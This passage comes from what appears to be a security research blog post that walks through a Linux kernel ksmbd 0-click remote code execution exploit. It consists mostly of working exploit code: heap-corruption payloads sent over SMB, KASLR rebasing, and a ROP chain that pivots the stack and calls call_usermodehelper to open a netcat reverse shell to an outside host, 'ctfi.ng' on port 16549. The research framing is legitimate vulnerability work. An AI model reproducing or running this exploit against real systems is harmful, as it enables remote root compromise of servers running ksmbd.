log.info(f'stack pivot: {hex(leave_ret)}')
log.info(f'pop rdi: {hex(pop_rdi)}')
log.info(f'pop rsi: {hex(pop_rsi)}')
log.info(f'pop rdx: {hex(pop_rdx)}')
log.info(f'pop rcx: {hex(pop_rcx)}')
log.info(f'pop_rsp: {hex(pop_rsp)}')
log.info(f'envp: {hex(envp)}')
log.info(f'call_usermodehelper: {hex(call_usermodehelper)}')
log.info(f'msleep: {hex(msleep)}')

log.info(f'choosing our target: {hex(target)}')

payload = (b'Z' * 40 + (kmalloc512_leak[0x68:]).ljust(0x200 - 0x68, b'Z') +
           p64(0xbaad) + p16(0x311) + b'X' * 16 +
           kmalloc512_leak[0x8+18:0x38] + p64(target))
os.environ['IMPACKET_OVERFLOW_NTLM'] = base64.b64encode(payload).decode()
# note when logging in, a kmalloc-512 allocation is made and then freed for storing cipher stuff
evil._SMBConnection.login_finish()
os.environ.pop("IMPACKET_OVERFLOW_NTLM", None)
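The rebasing arithmetic can be checked in isolation. In the sketch below, the two static addresses are the ones from the snippet above (specific to that 6.1.45 build), while the leaked pointer is a made-up value for illustration. It also shows why comparing the low 16 bits of the first leaked qword against 0xdd00 works as a sanity check, assuming the usual 2 MiB alignment of the x86_64 KASLR slide.

```python
STATIC_KERNEL_BASE = 0xffffffff81000000
# Static address of the symbol whose pointer sits at the start of ksmbd_conn,
# taken from the exploit snippet (build-specific).
STATIC_SMB311_SERVER_VALUES = 0xffffffff82fcdd00


def kaslr_base_from_leak(leaked_ptr: int) -> int:
    """Subtract the symbol's static offset from its leaked runtime address."""
    return leaked_ptr - (STATIC_SMB311_SERVER_VALUES - STATIC_KERNEL_BASE)


def rebase(static_addr: int, kaslr_base: int) -> int:
    """Translate a static (non-randomized) address to its runtime address."""
    return kaslr_base + (static_addr - STATIC_KERNEL_BASE)


# Hypothetical leaked value, standing in for kmalloc1k_leak_q[0].
leaked = 0xffffffff9dfcdd00

kaslr_base = kaslr_base_from_leak(leaked)
slide = kaslr_base - STATIC_KERNEL_BASE
pop_rdi = rebase(0xffffffff81031157, kaslr_base)

# An aligned slide leaves the low bits of every kernel address untouched,
# so the leaked pointer keeps the symbol's static low 16 bits.
low_bits_match = (leaked & 0xffff) == (STATIC_SMB311_SERVER_VALUES & 0xffff)
```

For this made-up leak the base comes out as 0xffffffff9c000000, and every gadget address is shifted by the same slide.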

Our end goal is to just call call_usermodehelper to pop a reverse shell and put the kernel thread into infinite sleep with msleep in the ROP chain.

With the arbitrary free, we can reclaim the misaligned chunk and overwrite the target ksmbd_conn object with a large enough ksmbd request to go into kmalloc-1k. The data we control has to start a bit further into the request because earlier parts of the payload get overwritten (perhaps by tcp sk_buff processing?).

Initially, I hijacked the local_nls pointer to redirect to a vtable (forged upon the ksmbd_conn object) where the function pointer had the value of 0x1337babebaadbeef. The kernel crash showed the following:

[ 209.080442] RAX: 1337babebaadbeef RBX: 0000000000000000 RCX: ffff888102d97b00
[ 209.084157] RDX: 0000000000000006 RSI: ffffc90000043db2 RDI: 0000000000000066
[ 209.087849] RBP: ffff888102d97b00 R08: ffff888102d97c00 R09: 0000000000000052
[ 209.091570] R10: 000000000000000a R11: d9b8d6dba644bded R12: ffff888102f70052
[ 209.095254] R13: 0000000000000008 R14: 0000000000000010 R15: 0000000000000000

In this case, the target for the arbitrary free was 0xffff888102d97a40, so we control the contents that rbp, rcx, and r8 point to (potentially at an offset). The rbp and rcx registers also point to the base of the nls_table object we forged.

To successfully ROP, we would have to stack pivot into the misaligned chunk with our controlled data. These days, finding good kernel gadgets with traditional ROP chain tooling like rp++ or ROPGadget can be frustrating due to runtime patching and micro-architectural side-channel mitigations - I usually just revert to using objdump. Luckily for us here, we control rbp so we can just rely on a leave; ret gadget to pivot into our controlled data. Here is how I laid out the ROP chain:

cmd_base = target + 0x168
cmd = [b'/usr/bin/nc.traditional\x00', b'-e\x00', b'/bin/sh\x00', b'ctfi.ng\x00', b'16549\x00']
cmd_argv = b''.join(
    map(p64, (cmd_base + offset for offset in accumulate([0] + [len(x) for x in cmd[:-1]])))
)
evil_nls = (p64(0x4141414141414141) + p64(pop_rdi) + p64(leave_ret) +
            p64(pop_rdi) + p64(cmd_base) +
            p64(pop_rsi) + p64(target + 0x138) +
            p64(pop_rdx) + p64(envp) +
            p64(pop_rcx) + p64(0) +
            p64(call_usermodehelper) +
            p64(pop_rdi) + p64(0x7fffffff) +
            p64(msleep) +
            cmd_argv + p64(0x0) + b''.join(c for c in cmd))
payload = (b'\x68' * (0x4+8*11) + evil_nls.ljust(0x1c0-0x68-8*11, b'\x68') +
           kmalloc1k_leak[:0x58] + p64(target+0xc0) + kmalloc1k_leak[0x60:0x238-0x70])
log.info(f'payload len: {hex(len(payload))}')

log.info('triggering arb free')
# free preauth_hash with authentication path
conns[overflowed_conn]._SMBConnection.login_finish()

try:
    leaker.setInfo(
        tid, fid,
        inputBlob=payload,
        infoType=SMB2_0_INFO_FILE,
        fileInfoClass=SMB2_FULL_EA_INFO
    )
except:
    pass

log.info('vtable should be hijacked')
conns[target_conn]._SMBConnection.login_finish()

Then, in the last line, we just attempt the second stage of session setup on the corrupted ksmbd_conn object to trigger the ROP chain and pop a reverse shell!
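The hard-coded offsets in the ROP chain (0xc0, 0x138, 0x168) are easier to trust once they are recomputed from the layout. The following sketch replaces the 15 ROP qwords with zero padding and checks only the addressing of the argv table and the command strings. It uses the target address from the crash discussed earlier as an example value and struct.pack in place of the pwntools p64 helper; the variable names other than cmd, cmd_base, and cmd_argv are made up for illustration.

```python
import struct
from itertools import accumulate


def p64(value: int) -> bytes:
    """Little-endian 64-bit pack, standing in for the pwntools helper."""
    return struct.pack("<Q", value)


target = 0xffff888102d97a40   # misaligned free target from the crash above
nls_base = target + 0xc0      # where the forged nls_table / ROP chain starts

cmd = [b'/usr/bin/nc.traditional\x00', b'-e\x00', b'/bin/sh\x00',
       b'ctfi.ng\x00', b'16549\x00']
cmd_base = target + 0x168

# Running sum of string lengths gives each argument's offset in the blob.
string_offsets = list(accumulate([0] + [len(x) for x in cmd[:-1]]))
cmd_argv = b''.join(p64(cmd_base + off) for off in string_offsets)

ROP_QWORDS = 15  # qwords in evil_nls that precede cmd_argv
forged = b'\x00' * (8 * ROP_QWORDS) + cmd_argv + p64(0) + b''.join(cmd)

argv_addr = nls_base + 8 * ROP_QWORDS
strings_addr = argv_addr + len(cmd_argv) + 8  # skip the NULL argv terminator


def string_at(addr: int, length: int) -> bytes:
    """Read back bytes from the forged blob by runtime address."""
    start = addr - nls_base
    return forged[start:start + length]


resolved = [
    string_at(struct.unpack_from("<Q", cmd_argv, 8 * i)[0], len(arg))
    for i, arg in enumerate(cmd)
]
```

With these numbers, nls_base equals the RBP and RCX values in the crash dump, the argv table lands at target + 0x138 (the value loaded into rsi), and the first string lands at target + 0x168 (the value loaded into rdi).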

The whole exploit can be found here.

There are some limitations though. The last stage is unstable on multi-core setups due to per-CPU slabs. The corrupted connections must remain alive, and some commands will cause the kernel to crash due to the corrupted heap. In a real world exploit, one would have to spend time to clean up the kernel after receiving a reverse shell (if that's what they even want) for post-exploitation stability and persistence. I did not really spend any time attempting those ideas as this was meant as just a research exercise :)

Overall, this was my first attempt at a kernel network 0-click exploit. ksmbd isn’t very commonly deployed, but this was still a really fun exercise - hopefully I can eventually find my magnum opus of an exploit! Thank you to syst3mfailure.io for the support during this experience and to the rest of the Crusaders of Rust security research group for feedback on this article. Thank you also to the MATCHA group at MIT CSAIL for the opportunity of a post-grad summer of kernel security research. As always, feel free to let me know of any questions, concerns, corrections, inquiries, or anything else.

Sunday, September 14, 2025

Eternal-Tux: Crafting a Linux Kernel KSMBD 0-Click RCE Exploit from N-Days